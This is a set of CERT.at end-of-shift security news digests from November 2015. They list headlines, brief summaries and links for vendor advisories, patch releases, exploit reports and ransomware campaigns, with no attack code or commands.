http://www.volatilityfoundation.org/?_escaped_fragment_=25/c1f29
*** Die Apache Software Foundation zu dem Java Commons Collection/Java (De)Serialization Problem ***
---------------------------------------------
Die Apache Software Foundation zu dem Java Commons Collection/Java (De)Serialization Problem12. November 2015Die Apache Software Foundation hat dazu einen ausführlichen Blog-Post verfasst. Die Money Quote daraus: "Even when the classes implementing a certain functionality cannot be blamed for this vulnerability, and fixing the known cases will also not make the usage of serialization in an untrusted context safe, there is still demand to fix at least the known cases, even when this...
---------------------------------------------
http://www.cert.at/services/blog/20151112140918-1625.html
*** R-Scripts VRS 7R Multiple Stored XSS And CSRF Vulnerabilities ***
---------------------------------------------
The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Stored cross-site scripting vulnerabilitity was also discovered. The issue is triggered when input passed via multiple POST parameters is not properly sanitized before being returned to the user. This can be exploited to execute...
---------------------------------------------
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5274.php
*** Cisco FireSight Management Center Web Framework Cross-Site Scripting Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Google Picasa CAMF Section Integer Overflow Vulnerability ***
---------------------------------------------
2) Severity Rating: Highly critical Impact: System Access Where: From remote ... 4) Solution Update to version 3.9.140 Build 259.
---------------------------------------------
http://www.securityfocus.com/archive/1/536878
*** Citrix XenServer Security Update for CVE-2015-5307 and CVE-2015-8104 ***
---------------------------------------------
A security vulnerability has been identified in Citrix XenServer that may allow a malicious administrator of an HVM guest VM to crash the host. This vulnerability affects all currently supported versions of Citrix XenServer up to and including Citrix XenServer 6.5 Service Pack 1.
---------------------------------------------
http://support.citrix.com/article/CTX202583
*** Security Notice - Statement on Security Researchers Revealing a Security Vulnerability in Huawei HG630a&HG630a-50 on Packet Storm Website ***
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…
=======================
= End-of-Shift report =
=======================
Timeframe: Dienstag 10-11-2015 18:00 − Mittwoch 11-11-2015 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** November 2015 Security Update Release Summary ***
---------------------------------------------
Today we released security updates to provide protections against malicious attackers. As a best practice, we encourage customers to apply security updates as soon as they are released. More information about this month's security updates and advisories can be found in the Security TechNet Library. MSRC Team
---------------------------------------------
http://blogs.technet.com/b/msrc/archive/2015/11/10/november-2015-security-u…
*** MSRT November 2015: Detection updates ***
---------------------------------------------
The Microsoft Malicious Software Removal Tool (MSRT) is updated monthly with new malware detections - so far this year we have added 29 malware families. This month we are updating our detections for some of the malware families already included in the tool. We choose the malware families we add to the MSRT each month using several criteria. One of the most common reasons is the prevalence of a family in the malware ecosystem. For example, in recent months we focused on...
---------------------------------------------
http://blogs.technet.com/b/mmpc/archive/2015/11/10/msrt-november-2015-detec…
*** Patchday: Adobe pflegt den Flash-Patienten ***
---------------------------------------------
Flash liegt mal wieder auf dem OP-Tisch und wird geflickt. Nutzer sollten ihren Flash-Patienten zügig behandeln, denn die Lücken gelten als kritisch. Exploits sollen aber noch nicht kursieren.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Patchday-Adobe-pflegt-den-Flash-Pati…
*** What You Should Know about Triangulation Fraud and eBay ***
---------------------------------------------
The increasing phenomenon of triangulation fraud on eBay has led to a published analysis on behalf of the company, as to how buyers should get informed and what they should pay attention to. Over the past few months, a new phenomenon has risen and its proportions have been growing exponentially. It seems that, even if...
---------------------------------------------
http://securityaffairs.co/wordpress/41891/cyber-crime/triangulation-fraud-a…
*** Symantec Endpoint Protection: Alte Sicherheitslücke bricht wieder auf ***
---------------------------------------------
Eine totgeglaubte Schwachstelle ist wieder da, da ein älterer Patch nur Teile des Problems angegangen ist. Das aktuelle Update für Symantecs Endpoint Protection soll es nun richten und noch weitere Schwachstellen abdichten.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Symantec-Endpoint-Protection-Alte-Si…
*** What Happens to Hacked Social Media Accounts ***
---------------------------------------------
This article is going to look at a few reasons why a social media account is hacked. The goal is for you to understand why you will want to better protect your account, regardless of whether or not you see yourself as "important".
---------------------------------------------
http://www.tripwire.com/state-of-security/security-awareness/what-happens-t…
*** InstaAgent: Passwort-sammelnder Instagram-Client fliegt aus App Store und Google Play ***
---------------------------------------------
Die App, die Nutzern verschiedene Zusatzinformationen zu ihrem Profil bei Facebooks populärem Foto-Dienst verspricht, sendete offenbar Instagram-Benutzernamen und Passwort im Klartext an einen Dritt-Server.
---------------------------------------------
http://heise.de/-2917792
*** GasPot Integrated Into Conpot, Contributing to Open Source ICS Research ***
---------------------------------------------
In August of this year, we presented at Blackhat our paper titled The GasPot Experiment: Unexamined Perils in Using Gas-Tank-Monitoring Systems. GasPot was a honeypot designed to mimic the behavior of the Guardian AST gas-tank-monitoring system. It was designed to look like no other existing honeypot, with each instance being unique to make fingerprinting by attackers impossible. These were deployed within networks located in various countries, to give us a complete picture of the attacks...
---------------------------------------------
http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/4jNwbTj60bk/
*** Questions are the answeres - How to avoid becoming the blamed victim ***
---------------------------------------------
"You have to ask questions", I say. Questions before, during, and after a breach. If you ask the right questions at the right time, you'll be able to make better decisions than the knee-jerk ones you've been making.
---------------------------------------------
https://www.alienvault.com/blogs/security-essentials/questions-are-the-answ…
*** TA15-314A: Web Shells - Threat Awareness and Guidance ***
---------------------------------------------
Original release date: November 10, 2015 Systems Affected Web servers that allow web shells Overview This alert describes the frequent use of web shells as an exploitation vector. Web shells can be used to obtain unauthorized access and can lead to wider network compromise. This alert outlines the threat and provides prevention, detection, and mitigation strategies.Consistent use of web shells by Advanced Persistent Threat (APT) and criminal groups has led to significant cyber incidents.This...
---------------------------------------------
https://www.us-cert.gov/ncas/alerts/TA15-313A
*** Bugtraq: [security bulletin] HPSBGN03507 rev.2 - HP Arcsight Management Center, Arcsight Logger, Remote Cross-Site Scripting (XSS) ***
---------------------------------------------
http://www.securityfocus.com/archive/1/536877
*** Huawei HG630a / HG630a-50 Default SSH Admin Password ***
---------------------------------------------
Topic: Huawei HG630a / HG630a-50 Default SSH Admin Password Risk: High Text:# Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on Adsl Modems # Date: 10.11.2015 # Exploit Author: M...
---------------------------------------------
https://cxsecurity.com/issue/WLB-2015110087
*** Huawei Security Advisories ***
---------------------------------------------
*** Security Advisory - Input Validation Vulnerability in Huawei VP9660 Products ***
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
---------------------------------------------
*** Security Advisory - Directory Traversal Vulnerability in Huawei AR Router ***
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
---------------------------------------------
*** Security Advisory - DoS Vulnerability in Huawei U2990 and U2980 ***
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
---------------------------------------------
*** Security Advisory - DoS Vulnerability in Huawei eSpace 8950 IP Phone ***
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
---------------------------------------------
*** Security Advisory - DoS Vulnerability in Huawei eSpace 7900 IP Phone ***
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
---------------------------------------------
*** ZDI-15-549: AlienVault Unified Security Management av-forward Deserialization of Untrusted Data Remote Code Execution Vulnerability ***
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of AlienVault Unified Security Management. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/eDK-If3dTI8/
*** ZDI-15-548: AlienVault Unified Security Management Local Privilege Escalation Vulnerability ***
---------------------------------------------
This vulnerability allows local attackers to escalate privileges to root on vulnerable installations of AlienVault Unified Security Management. Authentication is not required to exploit this vulnerability.
---------------------------------------------
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/TpChWMSd5n0/
*** IBM Security Bulletins ***
---------------------------------------------
*** IBM Security Bulletin: IBM FileNet eForms is affected by vulnerabilities in Apache HttpComponents(CVE-2012-6153 and CVE-2014-3577) ***
http://www.ibm.com/support/docview.wss?uid=swg21962659
---------------------------------------------
*** IBM Security Bulletin: IBM Forms Server could be affected by a denial of service attack (CVE-2013-4517) ***
http://www.ibm.com/support/docview.wss?uid=swg21962659
---------------------------------------------
*** IBM Security Bulletin: Fix Available for Denial of Service Vulnerability in IBM WebSphere Portal (CVE-2015-7419) ***
http://www.ibm.com/support/docview.wss?uid=swg21969906
---------------------------------------------
*** IBM Security Bulletin: Additional Password Disclosure via application tracing in FlashCopy Manager on Windows, Data Protection for Exchange, and Data Protection for SQL CVE-2015-7404 ***
http://www.ibm.com/support/docview.wss?uid=swg21969514
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in libuser affect Power Hardware Management Console (CVE-2015-3245 CVE-2015-3246) ***
http://www.ibm.com/support/docview.wss?uid=nas8N1020961
---------------------------------------------
*** IBM Security Bulletin: IBM Cúram Social Program Management is vulnerable to a SQL injection attack ***
http://www.ibm.com/support/docview.wss?uid=swg21967851
---------------------------------------------
*** IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Content Collector and IBM CommonStore for Lotus Domino (CVE-2015-2613, CVE-2015-2601, CVE-2015-2625, CVE-2015-1931) ***
http://www.ibm.com/support/docview.wss?uid=swg21969654
---------------------------------------------
*** IBM Security Bulletin: Vulnerabilities in OpenSSL affect IBM WebSphere MQ ***
http://www.ibm.com/support/docview.wss?uid=swg21970103
---------------------------------------------
*** IBM Security Bulletin: Vulnerability in Diffie-Hellman ciphers affects IBM Expeditor (CVE-2015-4000) ***
http://www.ibm.com/support/docview.wss?uid=swg21959292
---------------------------------------------
*** Security Bulletin: Multiple vulnerabilities in IBM Java SDK 7 affect IBM Systems Director Storage Control ***
http://www.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5098822
---------------------------------------------
*** IBM Security Bulletin: IBM FileNet eForms is affected by vulnerabilities in Apache HttpComponents(CVE-2012-6153 and CVE-2014-3577) ***
http://www.ibm.com/support/docview.wss?uid=swg21970090
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Montag 09-11-2015 18:00 − Dienstag 10-11-2015 18:00
Handler: Robert Waldner
Co-Handler: Stephan Richter
*** The Internet of Bad Things, Observed ***
---------------------------------------------
In his VB2015 keynote address, Ross Anderson described attacks against EMV cards.The VB2015 opening keynote by Ross Anderson could hardly have been more timely. In his talk "The Internet of Bad Things, Observed", the Cambridge professor looked at various attacks against the EMV standard for payment cards - attacks that have been used to steal real money from real people.Such cards, often called chip-and-PIN or chip-and-signature, are generally seen as better protected against...
---------------------------------------------
http://www.virusbtn.com/blog/2015/11_10.xml?rss
*** Linux.Encoder.1: Ransomware greift Magento-Nutzer an ***
---------------------------------------------
Eine Malware für Linux verschlüsselt zurzeit die Daten von Nutzern des Magento-Shopsystems. Für die Entschlüsselung sollen die Opfer zahlen, doch die Angreifer haben geschlampt: Die Verschlüsselung lässt sich knacken.
---------------------------------------------
http://www.golem.de/news/linux-encoder-1-ransomware-greift-magento-nutzer-a…
*** Comodo fixes bug, revokes banned certificates ***
---------------------------------------------
After reporting last week that it had issued banned certificates that could facilitate man in the middle (MitM) attacks, Comodo has fixed the "subtle bug" that the companys Senior Research and Development Scientist Rob Stradling wrote prompted the problem.
---------------------------------------------
http://www.scmagazine.com/comodo-fixes-bug-revokes-banned-certificates/arti…
*** Proof-of-concept threat is reminder OS X is not immune to crypto ransomware ***
---------------------------------------------
Symantec analysis confirms that in the wrong hands, Mabouia ransomware could be used to attack Macs. Twitter Card Style: summary Analysis by Symantec has confirmed that the proof-of-concept (PoC) threat known as Mabouia works as described and could be used to create functional OS X crypto ransomware if it fell into the wrong hands.read more
---------------------------------------------
http://www.symantec.com/connect/blogs/proof-concept-threat-reminder-os-x-no…
*** Protecting Users and Enterprises from the Mobile Malware Threat, (Mon, Nov 9th) ***
---------------------------------------------
With recent news of mobile malicious adware that roots smartphones, attention is again being paid to mobile security and the malware threat that is posed to it. While mobile ransomware is also a pervasive and growing threat, there are mobile RATs (such as JSocket and OmniRAT) that are also able to take full remote control of mobile devices. Some of the functionality of those tolls includes the ability to use the microphone to listen in on victims and to view whatever is in front of the camera...
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20355&rss
*** Cisco Connected Grid Network Management System Privilege Escalation Vulnerability ***
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-…
*** Citrix XenServer Security Update for CVE-2015-5307 and CVE-2015-8104 ***
---------------------------------------------
A security vulnerability has been identified in Citrix XenServer that may allow a malicious administrator of an HVM guest VM to crash the host. ...
---------------------------------------------
http://support.citrix.com/article/CTX202583
*** PowerDNS Security Advisory 2015-03: Packet parsing bug can lead to crashes ***
---------------------------------------------
A bug was found using afl-fuzz in our packet parsing code. This bug, when exploited, causes an assertion error and consequent termination of the the pdns_server process, causing a Denial of Service. ... PowerDNS Authoritative Server 3.4.4 - 3.4.6 are affected. No other versions are affected. The PowerDNS Recursor is not affected.
---------------------------------------------
https://doc.powerdns.com/md/security/powerdns-advisory-2015-03/
=======================
= End-of-Shift report =
=======================
Timeframe: Freitag 06-11-2015 18:00 − Montag 09-11-2015 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** ICYMI: Widespread Unserialize Vulnerability in Java, (Mon, Nov 9th) ***
---------------------------------------------
On Friday, a blog post from Fox Glove Security was posted that details a widespread Java unserialize vulnerability that affects all the major flavors of middleware (WebSphere, WebLogic, et al). There is a lot of great details, including exploitation instructions for pentesters, in the post so go take a look. It didnt get much press because admittedly its complicated to explain. It also doesnt have a logo.
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20353&rss
*** SSH-Client PuTTY 0.66 schließt Sicherheitslücke ***
---------------------------------------------
Die neue Version des SSH- und Telnet-Clients bringt ein paar kleine Verbesserungen und Fehlerkorrekturen. Zudem wurde eine Sicherheitslücke geschlossen.
---------------------------------------------
http://www.heise.de/newsticker/meldung/SSH-Client-PuTTY-0-66-schliesst-Sich…
*** Gratis-WLAN: Welche Risiken es gibt und wie man sich schützt ***
---------------------------------------------
Ein öffentliches Netzwerk ist praktisch, Nutzer sollten sich aber nicht blindlings einloggen
---------------------------------------------
http://derstandard.at/2000025293625
*** Guide to application whitelisting ***
---------------------------------------------
The National Institute of Standards and Technology (NIST) has published a guide to deploying automated application whitelisting to help thwart malicious software from gaining access to organizations' computer systems.
---------------------------------------------
http://www.net-security.org/secworld.php?id=19079
*** Dangerous bugs leave open doors to SAP HANA systems ***
---------------------------------------------
The most serious software flaws ever have been found in SAPs HANA platform, the in-memory database platform that underpins many of the German companys products used by large companies.Eight of the flaws are ranked critical, the highest severity rating ...
---------------------------------------------
http://www.cio.com/article/3003054/dangerous-bugs-leave-open-doors-to-sap-h…
*** Vbulletin 5.1.X Unserialize Preauth RCE Exploit ***
---------------------------------------------
https://cxsecurity.com/issue/WLB-2015110060
*** Ransomware meets CMS / Linux ***
---------------------------------------------
Ransomware am PC gibt es schon seit Jahren: Die Malware sperrt/verschlüsselt den infizierten PC und verlangt Lösegeld dafür, damit der User weiterarbeiten kann.Dass schlecht gewartete Webseiten mit Joomla, Wordpress, Drupal & co ein Fressen für Hacker sind, ist auch nichts neues. Wir sehen regelmäßig Wellen an Defacements und Exploitpacks, wenn mal wieder jemand das Ausnutzen einer Web-Schwachstelle automatisiert.
---------------------------------------------
http://www.cert.at/services/blog/20151109095947-1618.html
*** Google AdWords API client libraries - XML eXternal Entity Injection (XXE) ***
---------------------------------------------
Confirmed in googleads-php-lib <= 6.2.0 for PHP, AdWords libraries: googleads-java-lib for Java, and googleads-dotnet-lib for .NET are also likely to be affected.
---------------------------------------------
http://legalhackers.com/advisories/Google-AdWords-API-libraries-XXE-Injecti…
*** Closing the Open Door of Java Object Serialization ***
---------------------------------------------
If you can communicate with a JVM using Java object serialization using java.io.ObjectInputStream, then you can send a class that can execute commands against the OS from inside of the readObject method, and thereby get shell access. Once you have shell access, you can modify the Java server however you feel like. This is a class of exploit called 'deserialization of untrusted data', aka CWE-502. It's a class of bug that has been encountered from Python, PHP, and from Rails.
---------------------------------------------
https://tersesystems.com/2015/11/08/closing-the-open-door-of-java-object-se…
*** Protecting Windows Networks - Defeating Pass-the-Hash ***
---------------------------------------------
Pass-the-hash is popular attack technique to move laterally inside the network that relies on two components - the NTLM authentication protocol and ability to gain password hashes. This attack allows you to log in on the systems via stolen hash instead of providing clear text password, so there is no need to crack those hashes. To make use of this attack, attacker already has to have admin rights on the box, which is a plausible scenario in a modern "assume breach" mindset.
---------------------------------------------
https://dfirblog.wordpress.com/2015/11/08/protecting-windows-networks-defea…
*** Security Notice - Statement about Path Traversal Vulnerability in Huawei HG532 Routers Disclosed by CERT/CC ***
---------------------------------------------
It is confirmed that some customized versions of Huawei HG532, HG532e, HG532n, and HG532s have this vulnerability. Huawei has prepared a fixed version for affected carriers and is working with them to release the fixed version.
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-notices…
*** No surprise here: Adobes Flash is a hackers favorite target ***
---------------------------------------------
Adobe Systems Flash plugin gets no love from anyone in the security field these days. A new study released Monday shows just how much it is favored by cybercriminals to sneak their malware onto computers.
---------------------------------------------
http://www.cio.com/article/3002668/no-surprise-here-adobes-flash-is-a-hacke…
*** Joomla CMS - Bad Cryptography - Multiple Vulnerabilities ***
---------------------------------------------
heres a complete enumeration of what Ive found:
- JCrypt: Silent fallback to a weak, userspace PRNG (which is very bad for cryptography purposes)
- JCryptCipherSimple: Homegrown weak cipher (XOR-ECB)
- JCryptCipher: Chosen ciphertext attacks (no authentication)
- JCryptCipher: Data corruption / padding oracle attack
- JCryptCipher: Static IV for CBC mode (stored with JCryptKey under the misnomer property, "public") -- this sort of defeats the purpose of using CBC mode
- JCryptPasswordSimple: PHP Non-Strict Type Comparison (a.k.a. Magic
Hash vulnerability)
---------------------------------------------
http://www.openwall.com/lists/oss-security/2015/11/08/1
*** HTTP Evasions Explained - Part 7 - Lucky Numbers ***
---------------------------------------------
This is part seven in a series which will explain the evasions done by HTTP Evader. This part will be about using the wrong or even invalid status codes to evade the analysis. For 30% of the firewalls in the tests reports Ive got it is enough to use a status code of 100 instead of 200 to bypass analysis and at least Chrome, IE and Edge will download the data even with this wrong status code:
---------------------------------------------
http://noxxi.de/research/http-evader-explained-7-lucky-number.html
*** Security Advisory: Linux kernel vulnerability CVE-2014-9419 ***
---------------------------------------------
F5 Product Development has assigned ID 530413 (BIG-IP), ID 530553 (BIG-IQ), ID 530554 (Enterprise Manager), ID 520651 (FirePass), ID 461496 (ARX), and INSTALLER-1299 (Traffix) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/17000/500/sol17551.htm…
*** IBM Security Bulletins ***
---------------------------------------------
*** Vulnerabilities in Qemu affect PowerKVM (Multiple Vulnerabilities) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022875
---------------------------------------------
*** IBM Smart Analytics System 5600 is affected by vulnerabilities in IBM GPFS (CVE-2015-4974, CVE-2015-4981) ***
http://www.ibm.com/support/docview.wss?uid=swg21969198
---------------------------------------------
*** Authentication Bypass vulnerability found in IBM Sterling B2B Integrator (CVE-2015-5019) ***
http://www.ibm.com/support/docview.wss?uid=swg21967781
---------------------------------------------
*** IBM Smart Analytics System 5600 is affected by a vulnerability in BIND (CVE-2015-5722) ***
http://www.ibm.com/support/docview.wss?uid=swg21964962
---------------------------------------------
*** Vulnerability in Net-SNMP affects PowerKVM (CVE-2015-5621) ***
http://www.ibm.com/support/docview.wss?uid=isg3T1022903
---------------------------------------------
*** Multiple vulnerabilities in IBM Java SDK affect IBM Emptoris Strategic Supply Management, and IBM Emptoris Services Procurement. ***
http://www.ibm.com/support/docview.wss?uid=swg21969875
---------------------------------------------
*** Multiple OpenSSL Vulnerabilities affect IBM WebSphere MQ 5.3 on HP NonStop (CVE-2015-1788) (CVE-2015-1789) (CVE-2015-1791) ***
http://www.ibm.com/support/docview.wss?uid=swg21966723
---------------------------------------------
*** Multiple vulnerabilities in IBM Java Runtime affect Security Directory Integrator ***
https://www-304.ibm.com/support/docview.wss?uid=swg21969901
---------------------------------------------
=======================
= End-of-Shift report =
=======================
Timeframe: Donnerstag 05-11-2015 18:00 − Freitag 06-11-2015 18:00
Handler: Robert Waldner
Co-Handler: n/a
*** jQuery.min.php Malware Affects Thousands of Websites ***
---------------------------------------------
Fake jQuery injections have been popular among hackers since jQuery itself went mainstream and became one of the most widely adopted JavaScript libraries. Every now and then we write about such attacks. Almost every week we see new fake jQuery domains and scripts that mimic jQuery.
---------------------------------------------
https://blog.sucuri.net/2015/11/jquery-min-php-malware-affects-thousands-of…
*** OmniRAT malware scurrying into Android, PC, Mac, Linux systems ***
---------------------------------------------
Leverages Stagefright scare for installs As police across Europe crack down on the use of the DroidJack malware, a similar software nasty has emerged that can control not just Android, but also Windows, Mac, and Linux systems and is being sold openly at a fraction of the cost.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2015/11/06/omnirat_mal…
*** Check Point Discovers Critical vBulletin 0-Day ***
---------------------------------------------
As widely reported, the main vBulletin.org forum was compromised earlier this week and an exploit for a vBulletin 0-day was up for sale in online markets. A patch later released by vBulletin fixes the vulnerability reported, but fails to neither credit any reporting nor mention the appropriate CVE number. As the vulnerability is now fixed and an exploit exists in the wild with public analyses, we follow with the technical description as submitted to vBulletin.
---------------------------------------------
http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulle…
*** Peter Kieseberg @ 5th KIRAS Fachtagung ***
---------------------------------------------
Today Peter Kieseberg (SBA Research) presented the results of the SCUDO-Project together with Alexander Szönyi (Thales Austria) and Wolfgang Rosenkranz (Repuco) at the 5th 'KIRAS Fachtagung' in the Austria Trend Hotel Savoyen Vienna. This project was focused on the development of a training process for defence simulation trainings in the area of critical infrastructures ...
---------------------------------------------
https://www.sba-research.org/2015/11/05/peter-kieseberg-5th-kiras-fachtagun…
*** Bundestag will Mitarbeitern Flash verbieten ***
---------------------------------------------
Nach dem schweren Hackerangriff vor rund sechs Monaten will der Deutsche Bundestag mit einigen Maßnahmen die IT-Sicherheit erhöhen. Mitarbeiter und Abgeordnete sollen zu längeren Passwörtern und PINs mit mindestens acht Zeichen verpflichtet werden, außerdem werden Flash und andere Browsererweiterungen von den Rechnern verbannt, wie Spiegel Online unter Berufung auf ein internes Dokument der Bundestagsverwaltung berichtet.
---------------------------------------------
http://www.golem.de/news/nach-hackerangriff-bundestag-will-flash-verbieten-…
*** Slides from RUXCON, Oct. 24-25, Melbourne ***
---------------------------------------------
* DNS as a Defense Vector, Paul Vixie
* High Performance Fuzzing, Richard Johnson
* MalwAirDrop: Compromising iDevices via AirDrop, Mark Dowd
* Broadcasting Your Attack: Security Testing DAB Radio In Cars, Andy Davis
* Windows 10: 2 Steps Forward, 1 Step Back, James Forshaw
...
---------------------------------------------
https://ruxcon.org.au/slides/?year=2015
*** Tracking HTTP POST data with ELK, (Fri, Nov 6th) ***
---------------------------------------------
The Apache webserver has a very modular logging system. It is possible to customize what to log and how. But it lacks in logging data submitted to the server via POST HTTP requests. Recently, I had to investigate suspicious HTTP traffic and one of the requirements was to analyze POST data. If you already have a solution which performs full packet capture, youre lucky but it could quickly become a pain to search for information across gigabytes of PCAP files.
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20345&rss
*** Encryption ransomware threatens Linux users ***
---------------------------------------------
November 6, 2015 Doctor Web warns users about new encryption ransomware targeting Linux operating systems. Judging from the directories in which the Trojan encrypts files, one can draw a conclusion that the main target of cybercriminals is website administrators whose machines have web servers deployed on. Doctor Web security researchers presume that at least tens of users have already fallen victim to this Trojan.
---------------------------------------------
http://news.drweb.com/show/?i=9686&lng=en&c=9
*** Advantech EKI Hard-coded SSH Keys Vulnerability ***
---------------------------------------------
This advisory provides mitigation details for a hard-coded SSH key vulnerability in Advantech's EKI-122X series products.
---------------------------------------------
https://ics-cert.us-cert.gov/advisories/ICSA-15-309-01
*** ICIT Brief: Know Your Enemies - A Primer on Advanced Persistent Threat Groups ***
---------------------------------------------
This primer provides an overview of the threat landscape, attack vectors, size and sophistication of threat actors. Some of the Groups and Platforms include: The Elderwood Platform, Topsec, Axiom, Hidden Lynx, Deep Panda, PLA Unit 61398, Putter Panda, Tarh Andishan, Ajax, Bureau 121, Energetic Bear, Uroburos, APT 28, Hammertoss, CrazyDuke, Sandworm, Syrian Electronic Army, Anonymous and Butterfly Group among others.
---------------------------------------------
http://icitech.org/icit-brief-know-your-enemies-a-primer-on-advanced-persis…
*** Security Advisory: NTP vulnerability CVE-2015-7704 ***
---------------------------------------------
An off-path attacker can send a crafted Kiss of Death (KoD) packet to the client, which will increase the client's polling interval to a large value and effectively disable synchronization with the server.
---------------------------------------------
https://support.f5.com:443/kb/en-us/solutions/public/17000/500/sol17566.htm…
*** Security Advisory - DoS Vulnerability in GPU Driver of Huawei Products ***
---------------------------------------------
Some Huawei products have a DoS vulnerability. An attacker may trick a user into installing a malicious application and use it to input invalid parameters into the GPU driver program of the products, which can crash the system of the device. (Vulnerability ID: HWPSIRT-2015-09017)
This vulnerability has been assigned Common Vulnerabilities and Exposures (CVE) ID: CVE-2015-7740.
Huawei has released software updates to fix these vulnerabilities.
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
*** Security Advisory - DoS Vulnerability in Camera Driver of Huawei Products ***
---------------------------------------------
Some Huawei products have a DoS vulnerability. An attacker who has the system or camera permission can input invalid parameters into the camera driver program to crash the system. (Vulnerability ID: HWPSIRT-2015-09013)
Huawei has released software updates to fix these vulnerabilities.
---------------------------------------------
http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor…
=======================
= End-of-Shift report =
=======================
Timeframe: Mittwoch 04-11-2015 18:00 − Donnerstag 05-11-2015 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** A Technical Look At Dyreza ***
---------------------------------------------
Inside the core of Dyreza - a look at its malicious functions and their implementation.Categories: Malware AnalysisTags: dyrezamalware(Read more...)
---------------------------------------------
https://blog.malwarebytes.org/intelligence/2015/11/a-technical-look-at-dyre…
*** Malicious spam with links to CryptoWall 3.0 - Subject: Domain [name] Suspension Notice, (Thu, Nov 5th) ***
---------------------------------------------
Introduction Since Monday 2015-10-26, weve noticed a particular campaign sending malicious spam (malspam) with links to download CryptoWall 3.0 ransomware. This campaign has been impersonating domain registrars. Conrad Longmore blogged about it last week [1], and Techhelplist.com has a good write-up on the campaign [2]. Several other sources have also discussed this wave of malspam [3, 4, 5, 6, 7, 8 to name a few]. For this diary, well take a closer look at the emails and associated CryptoWall
---------------------------------------------
https://isc.sans.edu/diary.html?storyid=20333&rss
*** CryptoWall 4.0 Released with a New Look and Several New Features ***
---------------------------------------------
The fourth member of the CryptoWall family of ransomware, CryptoWall 4.0, has just been released, complete with new features and a brand new look. We recently reported that CryptoWall 3.0 has allegedly caused over $325 million in annual damages. CryptoWall first emerged in April 2014. Its first major upgrade was dubbed CryptoWall 2.0, and first emerged in October...
---------------------------------------------
http://securityaffairs.co/wordpress/41718/cyber-crime/cryptowall-4-0-releas…
*** SSL-Zertifikate: Microsoft will sich schon nächstes Jahr von SHA-1 trennen ***
---------------------------------------------
Die Firma überlegt ob der neuen Qualität von Angriffen auf den Hash-Algorithmus, diesen schon Mitte 2016 auf die verbotene Liste zu setzen. Google und Mozilla gehen ähnliche Wege.
---------------------------------------------
http://heise.de/-2880134
*** Mabouia: The first ransomware in the world targeting MAC OS X ***
---------------------------------------------
Rafael Salema Marques, a Brazilian researcher, published a PoC about the existence of Mabouia ransomware, the first ransomware that targets MAC OS X. Imagine this scenario: You received a ransom warning on your computer stating that all your personal files had been locked. In order to unlock the files, you would have to pay $500.
---------------------------------------------
http://securityaffairs.co/wordpress/41755/cyber-crime/mabouia-ransomware-ma…
*** Meet the Android rooting adware that cannot be removed ***
---------------------------------------------
Researchers have identified a new strain of malicious adware that is impossible for affected Android device owners to uninstall.
---------------------------------------------
http://feedproxy.google.com/~r/SCMagazineHome/~3/Prm6r3X3tzk/
*** No C&C server needed: Russia menaced by offline ransomware ***
---------------------------------------------
Harder to take down, nyet? Miscreants have cooked up a new strain of ransomware that works offline and so might be more resistant to law enforcement takedown efforts as a result.
---------------------------------------------
http://go.theregister.com/feed/www.theregister.co.uk/2015/11/05/offline_ran…
*** Thousands of legitimate iOS apps discovered containing ad library backdoors ***
---------------------------------------------
More than 2,000 iOS apps stocked in Apples legitimate App Store reportedly contained backdoored versions of an ad library, which could have allowed for surveillance without users knowledge.
---------------------------------------------
http://feedproxy.google.com/~r/SCMagazineHome/~3/nxOb5Ac0sYo/
*** The Omnipresence of Ubiquiti Networks Devices on the Public Web ***
---------------------------------------------
There are ongoing in the wild attacks against Ubiquiti Networks devices. Attackers are using default credentials to gain access to the affected devices via SSH. The devices are infected by a botnet client that is able to infect other devices.Further information about these attacks is available at:Krebs on Security: http://krebsonsecurity.com/2015/06/crooks-use-hacked-routers-to-aid-cyberhe… Research: https://www.incapsula.com/blog/ddos-botnet-soho-router.htmlCARISIRT
---------------------------------------------
http://blog.sec-consult.com/2015/11/the-omnipresence-of-ubiquiti-networks.h…
*** vBulletin Exploits in the Wild ***
---------------------------------------------
The vBulletin team patched a serious object injection vulnerability yesterday, that can lead to full command execution on any site running on an out-of-date vBulletin version. The patch supports the latest versions, from 5.1.4 to 5.1.9. The vulnerability is serious and easy to exploit; it was used to hack and deface the main vBulletin.com website. As aRead More The post vBulletin Exploits in the Wild appeared first on Sucuri Blog.
---------------------------------------------
